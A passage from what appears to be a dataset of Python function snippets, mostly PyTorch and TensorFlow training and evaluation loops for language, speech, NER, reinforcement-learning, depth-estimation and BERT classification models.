word_tt.append(w_tt)\n # word_id_tt.append(ind_tt)\n \n # word_inp_print = np.reshape(word_inp, (model.num_steps, model.batch_size)).T\n # word_pred_print = np.reshape(word_pred, (model.num_steps, model.batch_size)).T\n # word_tt_print = np.reshape(word_tt, (model.num_steps, model.batch_size)).T\n # word_id_pred_ = np.reshape(word_id_pred, (model.num_steps, model.batch_size)).T\n # word_id_tt_ = np.reshape(word_id_tt, (model.num_steps, model.batch_size)).T\n # pred_word_id = np.asarray(word_id_pred_)\n # target_word_id = np.asarray(word_id_tt_)\n ######\n\n # loss = criterion(out_loss, tt)\n loss = criterion(out_loss, targetLoss)\n # loss.data[0] -> get the loss value\n\n costs += loss.data[0] * model.module.num_steps\n iters += model.module.num_steps\n\n if is_train:\n optimizer.zero_grad()\n loss.backward() # backward propagation\n torch.nn.utils.clip_grad_norm(model.parameters(), 0.25) # prevent gradient exploding\n optimizer.step()\n #for name, p in model.named_parameters():\n # \"\"\"if p.requires_grad:\n # print(name, p.data.size()) \"\"\"\n #p.data.add_(-lr, p.grad.data) # update the weight and bias\n if step % (epoch_size // 10) == 10:\n print(\"{} loss: {:8.5f}\".format(step * 1.0 / epoch_size, (costs/iters)))\n # print(\"{} perplexity: {:8.2f} speed: {} wps\".format(step * 1.0 / epoch_size, np.exp(costs / iters),\n # iters * model.batch_size / (time.time() - start_time)))\n \n # print(\"input:\")\n # print(word_inp_print)\n # print(\"----------------------\")\n # print(\"predict:\")\n # print(word_pred_print)\n # print(\"----------------------\")\n # print(\"target:\")\n # print(word_tt_print)\n\n # savewords(word_inp_print, 'input_train')\n # savewords(word_pred_print, 'predict_train')\n # savewords(word_tt_print, 'target_train')\n # elif is_test:\n # savewords(word_inp_print, 'input_test')\n # savewords(word_pred_print, 'predict_test')\n # savewords(word_tt_print, 'target_test')\n\n if is_train: \n diff_train = (torch.sign(out_loss) - targetLoss).data.cpu().numpy()\n tp = (diff_train == 0).sum()\n fp = (diff_train == 1).sum()\n fn = (diff_train == -2).sum()\n true_pos += tp\n false_pos += fp\n false_neg += fn\n\n if (is_train == False):\n diff_ = (torch.sign(out_loss) - targetLoss).data.cpu().numpy()\n tp = (diff_ == 0).sum()\n fp = (diff_ == 1).sum()\n fn = (diff_ == -2).sum()\n true_pos += tp\n false_pos += fp\n false_neg += fn\n\n if is_train:\n precision = true_pos / (true_pos + false_pos)\n recall = true_pos / (true_pos + false_neg)\n f1_score = 2 * precision * recall / (precision + 
recall)\n\n print(\"Training Precision: {:8.5f}\".format(precision))\n print(\"Training Recall: {:8.5f}\".format(recall))\n print(\"Training F1 score: {:8.5f}\".format(f1_score))\n\n if (is_train == False):\n precision = true_pos / (true_pos + false_pos)\n recall = true_pos / (true_pos + false_neg)\n f1_score = 2 * precision * recall / (precision + recall)\n\n print(\"Precision: {:8.5f}\".format(precision))\n print(\"Recall: {:8.5f}\".format(recall))\n print(\"F1 score: {:8.5f}\".format(f1_score))\n\n\n # if is_train:\n # total_train += model.batch_size \n # last = pred_word_id.shape[1]-1\n\n # for i in range(pred_word_id.shape[0]):\n # if (pred_word_id[i][last]==target_word_id[i][last]):\n # correct_train += 1\n\n # if (is_train == False):\n # total += model.batch_size\n # last = pred_word_id.shape[1]-1\n\n # for i in range(pred_word_id.shape[0]):\n # if (pred_word_id[i][last]==target_word_id[i][last]):\n # correct += 1\n\n\n # if is_train:\n # train_accuracy = correct_train / total_train * 100\n # print(\"accuracy: {:8.2f}\".format(train_accuracy))\n\n # if (is_train == False):\n # accuracy = correct / total * 100\n # print(\"accuracy: {:8.2f}\".format(accuracy))\n\n return (costs / iters)\n # return np.exp(costs / iters) ", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def run_step(self, model: SpeechModel, sess: tf.Session, stats: TestStatistics, save: bool, verbose=True, feed_dict: Dict=None):\n\n global_step = model.global_step.eval()\n \n if save:\n # Validate on the data set and write the summary\n 
avg_loss, decoded, label, summary = model.step(sess, update=False, decode=True, return_label=True, summary=True, feed_dict=feed_dict)\n model.summary_writer.add_summary(summary, global_step)\n \n else:\n # simply validate, no need to write the summary.\n avg_loss, decoded, label = model.step(sess, update=False, decode=True, return_label=True, feed_dict=feed_dict)\n \n decoded_ids_paths = [Test.extract_decoded_ids(path) for path in decoded]\n \n for label_ids in Test.extract_decoded_ids(label):\n expected_str = self.idsToSentence(label_ids)\n\n # Print the actual transcript text and the decoded (predicted) text\n # along with it, print the LED and WED so that we know how many letters and \n # words were incorrectly predicted.\n if verbose:\n print('Actual: {}'.format(expected_str))\n \n for decoded_path in decoded_ids_paths:\n decoded_ids = next(decoded_path)\n decoded_str = self.idsToSentence(decoded_ids)\n stats.track_decoding(decoded_str, expected_str)\n \n if verbose:\n print('Predicted: {}'.format(decoded_str))\n print('LED: {} WED: {}'.format(stats.letter_edit_distance,stats.word_edit_distance))", "def train(self):\r\n self.speaker2index_and_index2speaker()\r\n \"\"\"Initialize history matrix\"\"\"\r\n self.history = np.random.normal(loc=0, scale=0.1, size=(len(self.s2i), config.train.class_history))\r\n \"\"\"\"\"\"\r\n \"\"\"\"\"\"\r\n iterations = 0\r\n \"\"\"Get train/test\"\"\"\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"CTC loss\"\"\"\r\n # self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='mean')\r\n self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='none')\r\n for epoch in range(config.train.num_epochs):\r\n \"\"\"Make dataloader\"\"\"\r\n train_data = Dataset({'files': train, 'mode': 'train', 'metadata_help': metadata_help})\r\n train_gen = data.DataLoader(train_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=train_data.collate, drop_last=True)\r\n val_data = Dataset({'files': val, 'mode': 'train', 'metadata_help': metadata_help})\r\n val_gen = data.DataLoader(val_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=val_data.collate, drop_last=True)\r\n\r\n for batch_number, features in enumerate(train_gen):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n input_lengths = features['input_lengths']\r\n target_lengths = features['target_lengths']\r\n metadata = features[\"metadata\"]\r\n batch_speakers = [x['speaker'] for x in metadata]\r\n self.G = self.G.train()\r\n\r\n #ipdb.set_trace()\r\n \"\"\"Make input_lengths and target_lengths torch ints\"\"\"\r\n input_lengths = input_lengths.to(torch.int32)\r\n target_lengths = target_lengths.to(torch.int32)\r\n phones = phones.to(torch.int32)\r\n\r\n outputs = self.G(spectrograms)\r\n\r\n outputs = outputs.permute(1, 0, 2) # swap batch and sequence length dimension for CTC loss\r\n\r\n loss = self.ctc_loss(log_probs=outputs, targets=phones,\r\n input_lengths=input_lengths, target_lengths=target_lengths)\r\n\r\n \"\"\"Update the loss history\"\"\"\r\n self.update_history(loss, batch_speakers)\r\n if epoch >= 
config.train.regular_epochs:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[0])\r\n else:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[1])\r\n loss = loss * loss_weights\r\n\r\n # Backward and optimize.\r\n self.reset_grad()\r\n # loss.backward()\r\n loss.sum().backward()\r\n self.g_optimizer.step()\r\n\r\n if iterations % self.log_step == 0:\r\n print(str(iterations) + ', loss: ' + str(loss.sum().item()))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('loss', loss.sum().item(), iterations)\r\n\r\n if iterations % self.model_save_step == 0:\r\n \"\"\"Calculate validation loss\"\"\"\r\n val_loss = self.val_loss(val=val_gen, iterations=iterations)\r\n print(str(iterations) + ', val_loss: ' + str(val_loss))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('val_loss', val_loss, iterations)\r\n \"\"\"Save model checkpoints.\"\"\"\r\n if iterations % self.model_save_step == 0:\r\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(iterations))\r\n torch.save({'model': self.G.state_dict(),\r\n 'optimizer': self.g_optimizer.state_dict()}, G_path)\r\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\r\n\r\n iterations += 1", "def run(self):\n\t\tself._run_neural_network()\n\t\tself._run_webots()\n\n\t\t# We first wait for webots inputs\n\t\twebotsTurn = True\n\t\tneuralNetworkTurn = False\n\t\twhile True:\n\t\t\tif webotsTurn:\n\t\t\t\tprint \"reading data from webots:\"\n\t\t\t\twbtData = self._wbt_read_data()\n\t\t\t\tprint \"sending data to nn...\"\n\t\t\t\tself._send_data_to_nn(wbtData)\n\t\t\t\twebotsTurn = False\n\t\t\t\tneuralNetworkTurn = True\n\n\t\t\telif neuralNetworkTurn:\n\n\t\t\t\tprint \"reading data from nn:\"\n\t\t\t\tnnData = self._nn_read_data()\n\t\t\t\tif self._neuralNetwork.poll() != None: break\n\t\t\t\tprint \"sending data to webots...\"\n\t\t\t\tself._send_data_to_wbt(nnData)\n\t\t\t\tneuralNetworkTurn = False\n\t\t\t\twebotsTurn = True", "def train():\n pass", "def train(self):\n for i in xrange(self.num_steps):\n if c.ADVERSARIAL:\n # update discriminator\n batch = get_train_batch()\n print 'Training discriminator...'\n self.d_model.train_step(batch, self.g_model)\n\n # update generator\n batch = get_train_batch()\n print 'Training generator...'\n self.global_step = self.g_model.train_step(\n batch, discriminator=(self.d_model if c.ADVERSARIAL else None))\n\n # save the models\n if self.global_step % c.MODEL_SAVE_FREQ == 0:\n print '-' * 30\n print 'Saving models...'\n self.saver.save(self.sess,\n c.MODEL_SAVE_DIR + 'model.ckpt',\n global_step=self.global_step)\n print 'Saved models!'\n print '-' * 30\n\n # test generator model\n if self.global_step % c.TEST_FREQ == 0:\n self.test()", "def run(cfg): # pylint: disable=too-many-locals,too-many-statements\n # load_text\n voca, gazet, data_, pos_model, word_model = load_text(cfg)\n\n char_voca = voca['in']\n\n # Build Ner model\n model = build_model(cfg, char_voca=char_voca, word_voca=None,\n gazet=gazet, pos_voca=pos_model.cfg.voca['out'])\n\n epoch_syl_cnt = data_['train'].get_syllable_count()\n iter_per_epoch = epoch_syl_cnt // cfg.batch_size\n iter_to_rvt = iter_per_epoch * cfg.rvt_epoch\n\n # Load GPU\n if torch.cuda.is_available():\n model.cuda()\n\n # Loss / Optimizer\n criterion = nn.CrossEntropyLoss()\n optimizer = cfg.optimizer(model.parameters())\n\n losses = []\n accuracies = []\n f_scores = []\n\n iter_ = 1\n best_iter = 0\n\n # Remove existing log directory\n if cfg.clean:\n logging.info('==== removing log: %s 
====', cfg.model_dir)\n shutil.rmtree(cfg.model_dir)\n time.sleep(3)\n\n else:\n if cfg.ckpt_path.exists():\n logging.info('==== reverting from check point ====')\n model_dump = CheckPoint.load(cfg.ckpt_path)\n model.load_state_dict(model_dump['model'])\n optimizer.load_state_dict(model_dump['optim'])\n best_iter = model_dump['iter']\n iter_ = best_iter + 1\n losses.append(model_dump['loss'])\n accuracies.append(model_dump['accuracy'])\n f_scores.append(model_dump['f-score'])\n logging.info('---- iter: %dk, loss: %f, accuracy: %f, f-score: %f ----',\n iter_ // 1000, losses[-1], accuracies[-1], f_scores[-1])\n lrs = [param_group['lr'] for param_group in optimizer.param_groups]\n logging.info('learning rates: %s', ', '.join([str(_) for _ in lrs]))\n\n # Tensorboard Summary Writer\n sum_wrt = SummaryWriter(cfg.model_dir)\n\n # loss / accuracy / f-score logging (.tsv)\n log_path = cfg.model_dir.joinpath('log.tsv')\n logf = open(log_path, 'at' if cfg.ckpt_path.exists() else 'wt')\n if os.path.getsize(log_path) == 0:\n print('iter\\tloss\\taccuracy\\tf-score', file=logf)\n\n # Main Training Loop\n revert = 0\n one_more_thing = True # one more change to increase learning rate into 10 times\n batches = []\n while revert <= cfg.rvt_term or one_more_thing:\n for train_sent in data_['train']:\n # Convert to Tensor\n # labels [sentence_len]\n # contexts [sentence_len, 21]\n # gazet [sentence_len, 21, 15]\n train_sent.set_word_feature(pos_model, word_model, cfg.window)\n train_sent.set_pos_feature(pos_model, cfg.window)\n train_labels, train_contexts, train_gazet, train_pos, train_words = \\\n train_sent.to_tensor(voca, gazet, cfg.window, cfg.phoneme, cfg.gazet_embed)\n\n # Convert to Variable\n train_labels = Variable(train_labels)\n train_contexts = Variable(train_contexts)\n train_gazet = Variable(train_gazet)\n train_pos = Variable(train_pos, requires_grad=False)\n train_words = Variable(train_words, requires_grad=False)\n\n # Load on GPU\n if torch.cuda.is_available():\n train_labels = train_labels.cuda()\n train_contexts = train_contexts.cuda()\n train_gazet = train_gazet.cuda()\n train_pos = train_pos.cuda()\n train_words = train_words.cuda()\n\n # Reset Gradient\n optimizer.zero_grad()\n\n # Training mode (updates/dropout/batchnorm)\n model.train()\n\n # import ipdb; ipdb.set_trace()\n\n # Forward Prop\n outputs = model(train_contexts, train_gazet, train_pos, train_words)\n\n batches.append((train_labels, outputs))\n if sum([batch[0].size(0) for batch in batches]) < cfg.batch_size:\n continue\n batch_label = torch.cat([x[0] for x in batches], 0)\n batch_output = torch.cat([x[1] for x in batches], 0)\n batches = []\n\n # Backprop\n loss = criterion(batch_output, batch_label)\n loss.backward()\n optimizer.step()\n\n # Validation\n if iter_ % 1000 == 0:\n measure = tagger.PerformanceMeasure()\n # Freeze parameters\n model.eval()\n\n # Calculate loss\n losses.append(loss.data[0])\n for dev_sent in data_['dev']:\n # Convert to CUDA Variable\n dev_sent.set_word_feature(pos_model, word_model, cfg.window)\n dev_sent.set_pos_feature(pos_model, cfg.window)\n _, dev_contexts, dev_gazet, dev_pos, dev_words = \\\n dev_sent.to_tensor(voca, gazet, cfg.window, cfg.phoneme, cfg.gazet_embed)\n dev_contexts = Variable(dev_contexts, volatile=True)\n dev_gazet = Variable(dev_gazet, volatile=True)\n dev_pos = Variable(dev_pos, volatile=True)\n dev_words = Variable(dev_words, volatile=True)\n if torch.cuda.is_available():\n dev_contexts = dev_contexts.cuda()\n dev_gazet = dev_gazet.cuda()\n dev_pos = dev_pos.cuda()\n 
dev_words = dev_words.cuda()\n\n outputs = model(dev_contexts, dev_gazet, dev_pos, dev_words)\n\n _, predicts = outputs.max(1)\n dev_sent.compare_label(predicts, voca, measure)\n\n accuracy, f_score = measure.get_score()\n print(file=sys.stderr)\n sys.stderr.flush()\n if not f_scores or f_score > max(f_scores):\n logging.info('==== writing best model: %f ====', f_score)\n model.save(cfg.ckpt_path)\n check_point = CheckPoint(optimizer, model,\n {'iter': iter_, 'loss': loss.data[0],\n 'accuracy': accuracy, 'f-score': f_score})\n check_point.save(cfg.ckpt_path)\n logging.info('check point: %s', check_point)\n best_iter = iter_\n revert = 0\n one_more_thing = True\n accuracies.append(accuracy)\n f_scores.append(f_score)\n logging.info('---- iter: %dk, loss: %f, accuracy: %f, f-score: %f (max: %r) ----',\n iter_ // 1000, losses[-1], accuracy, f_score, max(f_scores))\n\n if cfg.model_dir.exists():\n sum_wrt.add_scalar('loss', losses[-1], iter_ // 1000)\n sum_wrt.add_scalar('accuracy', accuracy, iter_ // 1000)\n sum_wrt.add_scalar('f-score', f_score, iter_ // 1000)\n print('{}\\t{}\\t{}\\t{}'.format(iter_ // 1000, losses[-1], accuracy,\n f_score), file=logf)\n logf.flush()\n\n # revert policy\n if (iter_ - best_iter) > iter_to_rvt:\n revert += 1\n logging.info('==== revert to iter: %dk, revert count: %d ====',\n best_iter // 1000, revert)\n model_dump = CheckPoint.load(cfg.ckpt_path)\n model.load_state_dict(model_dump['model'])\n optimizer.load_state_dict(model_dump['optim'])\n lrs = []\n for param_group in optimizer.param_groups:\n param_group['lr'] *= (0.9 if one_more_thing else 0.8) ** revert\n lrs.append(param_group['lr'])\n best_iter = iter_\n logging.info('learning rates: %s', ', '.join([str(_) for _ in lrs]))\n elif iter_ % 100 == 0:\n print('.', end='', file=sys.stderr)\n sys.stderr.flush()\n\n iter_ += 1\n if revert > cfg.rvt_term and one_more_thing:\n logging.info('==== one more thing, revert to iter: %dk ====', best_iter // 1000)\n model_dump = CheckPoint.load(cfg.ckpt_path)\n model.load_state_dict(model_dump['model'])\n optimizer.load_state_dict(model_dump['optim'])\n lrs = []\n for param_group in optimizer.param_groups:\n param_group['lr'] *= 10.0\n lrs.append(param_group['lr'])\n best_iter = iter_\n revert = 0\n one_more_thing = False\n logging.info('learning rates: %s', ', '.join([str(_) for _ in lrs]))", "def run_epoch(self):\n print(\"Training\")\n self.set_train()\n\n for batch_idx in range(0, self.num_total_batch):\n\n before_op_time = time.time()\n # Choosing the dataloader for training model\n if self.choosing_dataset_to_train_with(batch_idx):\n # Synthetic dataset\n self.syn_or_real = 'syn'\n try:\n inputs = self.syn_train_iter.__next__()\n except StopIteration:\n print('Stopped as the iteration has reached to the END, and reloading the synthetic dataloader')\n self.syn_train_iter = iter(self.syn_train_loader)\n inputs = self.syn_train_iter.__next__()\n else:\n # Real dataset\n self.syn_or_real = 'real'\n try:\n inputs = self.real_train_iter.__next__()\n except StopIteration:\n print('Stopped as the iteration has reached to the END, and reloading the real dataloader')\n self.real_train_iter = iter(self.real_train_loader)\n inputs = self.real_train_iter.__next__()\n\n # Move all available tensors to GPU memory\n for key, ipt in inputs.items():\n if type(key) == tuple or key == \"depth_gt\":\n inputs[key] = ipt.to(self.device)\n\n # log less frequently after the first 2000 steps to save time & disk space\n self.step += 1\n self.early_phase = batch_idx % self.opt.log_frequency 
== 0\n self.mid_phase = False and self.step % self.opt.save_frequency == 0\n self.late_phase = self.num_total_batch - 1 == batch_idx\n\n outputs, losses = {}, {}\n # Depth estimation\n outputs_d, losses_d = self.process_batch(inputs)\n outputs.update(outputs_d)\n losses.update(losses_d)\n\n # No more if else conditions, just combine all losses based on availability of gradients\n final_loss = torch.tensor(0.).to(self.device)\n for k, v in losses.items():\n if ('d_' not in k) and v.requires_grad and ('/' not in k):\n final_loss += v\n final_loss.backward()\n losses[\"loss\"] = final_loss\n\n if (batch_idx + 1) % 2 == 0:\n self.model_optimizer.step()\n self.model_optimizer.zero_grad()\n self.zero_grad()\n\n duration = time.time() - before_op_time\n self.log_time(batch_idx, duration, losses[\"loss\"].cpu().data)\n\n if \"depth_gt\" in inputs:\n self.compute_depth_losses(inputs, outputs, losses)\n\n if self.early_phase or self.mid_phase or self.late_phase:\n self.log(\"train\", inputs, outputs, losses)\n self.val(\"real\")\n self.val(\"syn\")\n\n if (batch_idx + 1) % 2 == 0:\n current_lr = self.update_learning_rate(self.model_optimizer, self.opt.learning_rate)", "def train_step(self):\n # Sample training batch from replay\n training_batch = self.replay.sample(self.batch_size)\n\n # Calculate target Q values for each example:\n # For non-terminal states, targetQ is estimated according to\n # targetQ = r + gamma*Q'(s',max_a Q(s',a))\n # where Q' denotes the target network.\n # For terminating states the target is computed as\n # targetQ = r\n updates = []\n for exp in training_batch:\n start,_,reward,end = exp\n if(self.dampen_states):\n # To dampen states (usually done after major patches or when the meta shifts)\n # we replace winning rewards with 0.\n reward = 0.\n state_code = end.evaluate()\n if(state_code==DraftState.DRAFT_COMPLETE or state_code in DraftState.invalid_states):\n # Action moves to terminal state\n updates.append(reward)\n else:\n # Follwing double DQN paper (https://arxiv.org/abs/1509.06461).\n # Action is chosen by online network, but the target network is used to evaluate this policy.\n # Each row in predicted_Q gives estimated Q(s',a) values for all possible actions for the input state s'.\n feed_dict = {self.ddq_net.online_ops[\"input\"]:[end.format_state()],\n self.ddq_net.online_ops[\"valid_actions\"]:[end.get_valid_actions()]}\n predicted_action = self.ddq_net.sess.run(self.ddq_net.online_ops[\"prediction\"], feed_dict=feed_dict)[0]\n\n feed_dict = {self.ddq_net.target_ops[\"input\"]:[end.format_state()]}\n predicted_Q = self.ddq_net.sess.run(self.ddq_net.target_ops[\"outQ\"], feed_dict=feed_dict)\n\n updates.append(reward + self.ddq_net.discount_factor*predicted_Q[0,predicted_action])\n\n # Update online net using target Q\n # Experience replay stores action = (champion_id, position) pairs\n # these need to be converted into the corresponding index of the input vector to the Qnet\n actions = np.array([start.get_action(*exp[1]) for exp in training_batch])\n targetQ = np.array(updates)\n feed_dict = {self.ddq_net.online_ops[\"input\"]:np.stack([exp[0].format_state() for exp in training_batch],axis=0),\n self.ddq_net.online_ops[\"actions\"]:actions,\n self.ddq_net.online_ops[\"target\"]:targetQ,\n self.ddq_net.online_ops[\"dropout_keep_prob\"]:0.5}\n _ = self.ddq_net.sess.run(self.ddq_net.online_ops[\"update\"],feed_dict=feed_dict)", "def train(self):\n # Change directory to the code directory\n current_working_directory = os.getcwd()\n\n 
os.chdir(self.model_parameters[\"NN_code_directory\"])\n\n self.call_training_routine()\n\n # Come back to the original directory\n os.chdir(current_working_directory)", "def _train(self):\n training_environment = self._training_environment\n evaluation_environment = self._evaluation_environment\n policy = self._policy\n pool = self._pool\n\n if not self._training_started:\n self._init_training()\n\n self._initial_exploration_hook(\n training_environment, self._initial_exploration_policy, pool)\n\n self.sampler.initialize(training_environment, policy, pool)\n\n gt.reset_root()\n gt.rename_root('RLAlgorithm')\n gt.set_def_unique(False)\n\n self._training_before_hook()\n\n for self._epoch in gt.timed_for(range(self._epoch, self._n_epochs)):\n self._epoch_before_hook()\n gt.stamp('epoch_before_hook')\n\n start_samples = self.sampler._total_samples\n for i in count():\n samples_now = self.sampler._total_samples\n self._timestep = samples_now - start_samples\n\n if (samples_now >= start_samples + self._epoch_length\n and self.ready_to_train):\n break\n\n self._timestep_before_hook()\n gt.stamp('timestep_before_hook')\n\n self._do_sampling(timestep=self._total_timestep)\n gt.stamp('sample')\n\n if self.ready_to_train:\n self._do_training_repeats(timestep=self._total_timestep)\n gt.stamp('train')\n\n self._timestep_after_hook()\n gt.stamp('timestep_after_hook')\n\n training_paths = self.sampler.get_last_n_paths(math.ceil(self._epoch_length / self.sampler._max_path_length))\n gt.stamp('training_paths')\n evaluation_paths = self._evaluation_paths(policy, evaluation_environment)\n gt.stamp('evaluation_paths')\n\n training_metrics = self._evaluate_rollouts(training_paths, training_environment)\n gt.stamp('training_metrics')\n if evaluation_paths:\n evaluation_metrics = self._evaluate_rollouts(\n evaluation_paths, evaluation_environment)\n gt.stamp('evaluation_metrics')\n else:\n evaluation_metrics = {}\n\n self._epoch_after_hook(training_paths)\n gt.stamp('epoch_after_hook')\n\n sampler_diagnostics = self.sampler.get_diagnostics()\n\n diagnostics = self.get_diagnostics(\n iteration=self._total_timestep,\n batch=self._evaluation_batch(),\n training_paths=training_paths,\n evaluation_paths=evaluation_paths)\n\n time_diagnostics = gt.get_times().stamps.itrs\n\n diagnostics.update(OrderedDict((\n *(\n (f'evaluation/{key}', evaluation_metrics[key])\n for key in sorted(evaluation_metrics.keys())\n ),\n *(\n (f'training/{key}', training_metrics[key])\n for key in sorted(training_metrics.keys())\n ),\n *(\n (f'times/{key}', time_diagnostics[key][-1])\n for key in sorted(time_diagnostics.keys())\n ),\n *(\n (f'sampler/{key}', sampler_diagnostics[key])\n for key in sorted(sampler_diagnostics.keys())\n ),\n ('epoch', self._epoch),\n ('timestep', self._timestep),\n ('timesteps_total', self._total_timestep),\n ('train-steps', self._num_train_steps),\n )))\n\n if self._eval_render_kwargs and hasattr(\n evaluation_environment, 'render_rollouts'):\n # TODO(hartikainen): Make this consistent such that there's no\n # need for the hasattr check.\n training_environment.render_rollouts(evaluation_paths)\n\n yield diagnostics\n\n self.sampler.terminate()\n\n self._training_after_hook()\n\n yield {'done': True, **diagnostics}", "def train_and_evaluate(OUTPUT_DIR,do_train = True,do_eval=True):\n\n\t\n\tBATCH_SIZE = 32\n\tLEARNING_RATE = 2e-5\n\tNUM_TRAIN_EPOCHS = 5.0\n\n\t#in this steps lr will be low and training will be slow\n\tWARMUP_PROPORTION = 0.1\n\n\n\n\tif os.path.exists(OUTPUT_DIR) and os.listdir(OUTPUT_DIR) and 
do_train:\n\t\traise ValueError(\"Output directory ({}) already exists and is not empty.\".format(OUTPUT_DIR))\n\tif not os.path.exists(OUTPUT_DIR):\n\t\tos.makedirs(OUTPUT_DIR)\n\t\t\n\t#create train and test data\n\n\ttrain_sents,train_labels,test_sents,test_labels = create_train_test(\"ADE/DRUG-AE.rel\",\"ADE/negative_data_AE.rel\")\n\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ttokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", do_lower_case=True)\n\n\tif do_train:\n\n\t\ttrain_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(train_sents, train_labels)]\n\t\tnum_train_examples = len(train_examples)\n\n\t\tnum_train_steps = int(math.ceil(num_train_examples / BATCH_SIZE * NUM_TRAIN_EPOCHS))\n\t\tnum_warmup_steps = int(num_train_steps * WARMUP_PROPORTION)\n\n\t\tmodel = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\",num_labels = num_labels)\n\t\tmodel.to(device)\n\n\t\tparam_optimizer = list(model.named_parameters())\n\t\tno_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\t\toptimizer_grouped_parameters = [\n\t\t\t{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n\t\t\t{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n\t\t\t]\n\n\t\toptimizer = BertAdam(optimizer_grouped_parameters,lr=LEARNING_RATE,warmup=WARMUP_PROPORTION,t_total=num_train_steps)\n\n\t\tglobal_step = 0\n\t\tnb_tr_steps = 0\n\t\ttr_loss = 0\n\n\t\ttrain_features = convert_examples_to_features(\n\t\t\ttrain_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\n\t\tlogger.info(\"***** Running training *****\")\n\t\tlogger.info(\" Num examples = %d\", num_train_examples)\n\t\tlogger.info(\" Batch size = %d\", BATCH_SIZE)\n\t\tlogger.info(\" Num steps = %d\", num_train_steps)\n\n\n\t\tall_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.long)\n\n\t\ttrain_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)\n\t\ttrain_sampler = RandomSampler(train_data)\n\n\t\ttrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=BATCH_SIZE)\n\n\t\tmodel.train()\n\t\t# for name, param in model.named_parameters():\n\t\t# if param.requires_grad:\n\t\t# print(name)\n\t\t# return\n\t\tfor _ in trange(int(NUM_TRAIN_EPOCHS), desc=\"Epoch\"):\n\t\t\ttr_loss = 0\n\t\t\tnb_tr_examples, nb_tr_steps = 0, 0\n\t\t\tfor step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\t\t\t\tbatch = tuple(t.to(device) for t in batch)\n\t\t\t\tinput_ids, input_mask, segment_ids, label_id = batch\n\t\t\t\tloss = model(input_ids, segment_ids, input_mask, label_id)\n\t\t\t\tloss.backward()\n\n\t\t\t\ttr_loss += loss.item()\n\t\t\t\tnb_tr_examples += input_ids.size(0)\n\t\t\t\tnb_tr_steps += 1\n\t\t\t\toptimizer.step()\n\t\t\t\toptimizer.zero_grad()\n\t\t\t\tglobal_step += 1\n\t\t\tprint(tr_loss)\n\n\t\t# Save a trained model and the associated configuration\n\t\tmodel_to_save = model.module if hasattr(model, 'module') else model # Only save the model 